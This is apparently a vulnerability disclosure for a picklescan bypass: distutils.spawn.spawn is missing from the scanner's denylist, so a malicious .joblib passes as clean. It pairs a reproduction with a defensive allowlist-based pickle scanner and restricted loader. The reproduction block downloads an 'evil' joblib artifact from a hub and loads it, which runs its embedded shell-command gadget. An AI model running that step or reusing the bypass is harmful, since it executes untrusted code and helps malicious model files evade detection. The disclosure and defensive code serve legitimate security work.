distutils.spawn.spawn — picklescan bypass PoC (.joblib)

Security research PoC for huntr MFV submission.

Vulnerability: distutils.spawn.spawn is absent from picklescan's _unsafe_globals denylist. A .joblib file embedding this gadget executes arbitrary shell commands while picklescan reports issues=0, infected_files=0 (CLEAN).

Affected: picklescan ≤ 1.0.4 (latest), Python ≤ 3.11 (distutils was removed from the standard library in 3.12)

Reproduction

```bash
pip3 install joblib picklescan huggingface_hub
python3 -c "
import io, joblib
from huggingface_hub import hf_hub_download
from picklescan.scanner import scan_bytes

# fetch the PoC artifact from this repository
path = hf_hub_download('th3-j0k3r/distutils-spawn-picklescan-bypass', 'evil_distutils.joblib')

# picklescan walks the raw pickle stream and reports it clean
data = open(path, 'rb').read()
r = scan_bytes(io.BytesIO(data), 'evil_distutils.joblib')
print('picklescan result: issues=%d infected=%d' % (r.issues_count, r.infected_files))

# deserialising the same file runs the embedded gadget
joblib.load(path)
"
```
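picklescan's verdict rests on a denylist, so any gadget the list omits, distutils.spawn.spawn here, passes as clean. The following added example, which is not part of this repository or of picklescan, shows the defender's alternative: enumerate every global a pickle stream would import by walking its opcodes with pickletools.genops (nothing is unpickled), compare against an allowlist instead of a denylist, and load only through an Unpickler whose find_class refuses anything off that list. The DENYLIST_SAMPLE and ALLOWLIST sets, the helper names and the sample streams are constructed for illustration; the sample streams reference the gadget by name only and contain no call.

```python
"""Allowlist-based pickle import scanner (added example, not picklescan's code)."""
import collections
import io
import pickle
import pickletools

# Constructed denylist standing in for how a denylist scanner works; not picklescan's table.
DENYLIST_SAMPLE = {("os", "system"), ("posix", "system"), ("subprocess", "Popen"), ("builtins", "eval")}

# Constructed allowlist: the globals a typical joblib/numpy artifact needs. Tune per project;
# anything not listed is rejected, so an omitted gadget can never slip through.
ALLOWLIST = {
    ("collections", "OrderedDict"),
    ("numpy", "ndarray"),
    ("numpy", "dtype"),
    ("numpy.core.multiarray", "_reconstruct"),
    ("joblib.numpy_pickle", "NumpyArrayWrapper"),
}

# Opcodes whose operand is a string; two of them feed STACK_GLOBAL in protocol 4 streams.
_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def pickle_imports(data: bytes) -> set:
    """Every (module, name) the stream would import, found by opcode walk only."""
    found = set()
    strings = []   # string operands in stream order
    memo = {}      # memo slot -> string, so a BINGET of a memoized string is resolved
    last = None    # string pushed by the previous value-producing opcode, if any
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in ("GLOBAL", "INST"):               # protocols 0-3: operand is "module name"
            module, qualname = arg.split(" ", 1)
            found.add((module, qualname))
        elif name == "STACK_GLOBAL" and len(strings) >= 2:   # protocol 4+: two preceding strings
            found.add((strings[-2], strings[-1]))
        elif name == "MEMOIZE":
            memo[len(memo)] = last
            continue
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
            continue
        elif name in ("GET", "BINGET", "LONG_BINGET") and isinstance(memo.get(arg), str):
            strings.append(memo[arg])
            last = memo[arg]
            continue
        if name in _STRING_OPS:
            strings.append(arg)
            last = arg
        elif name not in ("PROTO", "FRAME", "STOP"):
            last = None                               # a non-string value is now on top
    return found


def scan_with_denylist(data: bytes) -> list:
    """What a denylist scanner reports: only imports it already knows about."""
    return sorted(i for i in pickle_imports(data) if i in DENYLIST_SAMPLE)


def scan_with_allowlist(data: bytes) -> list:
    """What an allowlist scanner reports: every import the artifact has no business making."""
    return sorted(i for i in pickle_imports(data) if i not in ALLOWLIST)


class AllowlistUnpickler(pickle.Unpickler):
    """Loader that refuses any global outside ALLOWLIST before it is resolved."""
    def find_class(self, module, name):
        if (module, name) in ALLOWLIST:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowlisted")


def restricted_load(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def restricted_load_rejects(data: bytes) -> bool:
    """True when the allowlist loader refuses the stream."""
    try:
        restricted_load(data)
    except pickle.UnpicklingError:
        return True
    return False


# Constructed sample streams: they name a global but carry no REDUCE, so nothing is called.
def global_ref_pickle(module: str, name: str) -> bytes:
    """Protocol 0 stream: GLOBAL module name, STOP."""
    return pickle.GLOBAL + f"{module}\n{name}\n".encode() + pickle.STOP


def stack_global_ref_pickle(module: str, name: str) -> bytes:
    """Protocol 4 stream: SHORT_BINUNICODE module, SHORT_BINUNICODE name, STACK_GLOBAL, STOP."""
    def short_unicode(s: str) -> bytes:
        b = s.encode()
        return pickle.SHORT_BINUNICODE + bytes([len(b)]) + b
    return (pickle.PROTO + b"\x04" + short_unicode(module) + short_unicode(name)
            + pickle.STACK_GLOBAL + pickle.STOP)


def benign_pickle() -> bytes:
    return pickle.dumps({"weights": [0.1, 0.2], "name": "toy-model"})


def allowed_global_pickle() -> bytes:
    return pickle.dumps(collections.OrderedDict([("a", 1)]))


if __name__ == "__main__":
    for label, stream in (("benign", benign_pickle()),
                          ("distutils.spawn ref", global_ref_pickle("distutils.spawn", "spawn"))):
        print(label, "denylist:", scan_with_denylist(stream), "allowlist:", scan_with_allowlist(stream))
```

Run stand-alone it prints the denylist verdict (empty, the bypass on this page) beside the allowlist verdict (the flagged import) for the constructed streams. The memo bookkeeping is there because a protocol 4 pickler may push an already memoized string with BINGET instead of repeating it before STACK_GLOBAL, and a scanner that only reads literal string operands would miss that reference.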